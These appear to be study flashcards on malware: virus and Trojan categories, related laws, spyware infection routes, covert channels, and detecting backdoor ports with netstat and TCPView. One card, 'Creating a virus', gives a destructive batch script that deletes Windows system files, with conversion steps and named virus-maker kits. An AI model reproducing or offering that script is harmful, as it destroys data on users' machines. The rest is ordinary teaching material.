Chapter 8: Trojans, Viruses, Worms, & Covert Channels Flashcards
Malware
short for malicious SW
a term that covers viruses, worms, Trojans, logic bombs, adware, & spyware
designed to perform malicious & disruptive actions; any type of SW that performs actions w/out the consent or knowledge of the system owner & results in disruptive actions
Covert channels
these channels are unknown, un-monitored pieces of a system that can be exploited to gain access
Malware & the Law (3)
THE COMPUTER FRAUD & ABUSE ACT - addresses federal computer-related offenses
THE PATRIOT ACT - penalties up to 10 years for a 1st offense, 20 years for a 2nd offense; assesses damages to multiple systems over the course of a year to determine if it exceeds $5000
CAN-SPAM ACT - designed to stop spam
Categories of Malware
VIRUSES - self-replicating application that attaches itself to executables; typically requires user action to initiate infectious activity
WORMS - successor to viruses; entirely self-replicating & spread quickly, do not need any action performed by the user, can spread across NWs crashing routers, consuming bandwidth & resources
TROJAN HORSES - provides covert access to a system; looks harmless; goals are similar to worm & virus, but info is transmitted & it is more stealthy
ROOTKITS - hide within the core components of a system, very difficult to detect
SPYWARE - collects & forwards info about a system or user's activities in a stealthy manner; most common are keyloggers
ADWARE - replaces homepages in browsers, places pop-up ads, or installs items on a system to advertise a product or service
Designing a Virus (6)
1) DESIGN - envision & create virus
2) REPLICATION - once deployed, virus spreads through replication
3) LAUNCH - virus carries out task for which it was created
4) DETECTION - virus becomes recognized, antivirus makers investigate
5) INCORPORATION - antivirus makers determine a way to identify the virus & incorporate remediation into their product updates
6) ELIMINATION - users of antivirus products incorporate updates & eliminate virus
Kinds of Viruses (12)
1) SYSTEM/BOOT SECTOR VIRUS - code in the MBR (master boot record); boot seq. is altered, can make the HD undetectable, etc.
2) MACRO VIRUSES - takes adv. of embedded languages (Word, Excel, etc.); designed to hide in those files & change configurations
3) CLUSTER VIRUSES - alters file-allocation tables causing file entries to point to the virus instead of the real file
4) STEALTH/TUNNELING VIRUS - uses various mechanisms to evade detection systems
5) ENCRYPTION VIRUSES - reprograms itself to avoid detection
6) CAVITY/FILE-OVERWRITING VIRUSES - hides in host file without changing the file's appearance
7) SPARSE-INFECTOR VIRUSES - avoid detection by carrying out infectious actions sporadically or on files of certain length or type, etc
8) COMPANION/CAMOUFLAGE VIRUS - uses SW w/ the same name but a different extension (e.g. if you execute program.exe, the virus may create program.com & execute that instead)
9) LOGIC BOMB - infects until predetermined event or action occurs; separated into two parts, payload & trigger
10) FILE/MULTIPARTITE VIRUS - infects in multiple ways using multiple attack vectors
11) SHELL VIRUSES - SW infects the target application & alters it
12) CRYPTOVIRUSES - encrypts certain files; victim is notified to contact virus creator & pay specific amount (ransom)
Hoax
makes user take action, but nothing happens (not really a virus, but just as dangerous)
Creating a virus
Do not execute this code bc it could cause a lot of damage
1) Create a batch file called virus.bat using Notepad
2) Enter the following code:
@echo off
Del c:\windows\ystem*.*
Del c:\windows*.*
3) Save virus.bat
4) From cmd, use bat2com to convert virus.bat into virus.com
Another way is to use JPS Virus Maker/TeraBIT Virus Maker 2.8 SE (Has GUI)
Sheep dip system
used to investigate, analyze & defend against malware; it is a computer specifically configured to analyze files; the computer is stripped down & includes only those services & apps needed to test the SW
Methods of Spyware infection
1) P2P
2) IM
3) IRC - internet relay chat
4) E-mail attachments
5) Physical access
6) Browser defects - unpatched browsers
7) Freeware - DLing free SW from unknown sources
8) Websites
9) SW installs - victim DLs SW, but packaged w/ it is a payload that is silently installed in the BG
What are the two items Trojans rely on?
1) OVERT CHANNELS - communication path or channel used to send info or perform other actions; HTTP & TCP/IP are examples of channels used to send info
2) COVERT CHANNEL - path used to transmit info, but does so in a way that is supposed to be impossible or it uses a process in a way that it was not intended to be used
Types of Trojans
1) RATs (REMOTE ACCESS TROJANS) - give attacker remote control over system
2) DATA SENDING - transmitting data captured
3) DESTRUCTIVE - seeks to corrupt, erase, or destroy data on system (could affect hardware too)
4) PROXY - attacker hides behind target’s system doing malicious things to another system
5) FTP - the infected host becomes a server hosting all kinds of info
6) SECURITY SW DISABLERS
Detecting Trojans & Viruses
Trojans are used to access through backdoors or covert channels, so a port must be opened to allow this communication.
Port scanning is used to detect them; tools such as nmap, netstat
1) Using Netstat
2) Using TCPview
NETSTAT
Used to detect open ports & listen for connections on the system
1) cmd: netstat -an
// CON: not real-time
TCPview // an executable file
Tracks port usage in real time
TCP vs UDP when choosing protocol to run open port for access to system
typical choice is TCP port bc it is more robust
UDP is typically used to traverse firewall or security architecture